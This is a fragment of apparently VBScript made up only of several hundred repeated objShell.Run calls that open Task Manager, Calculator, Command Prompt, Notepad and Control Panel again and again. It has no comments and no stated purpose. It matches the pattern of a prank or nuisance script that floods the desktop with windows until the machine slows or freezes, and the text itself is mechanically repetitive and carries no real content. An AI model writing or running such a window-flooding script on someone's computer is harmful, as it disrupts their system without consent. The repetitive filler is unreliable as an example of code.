objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
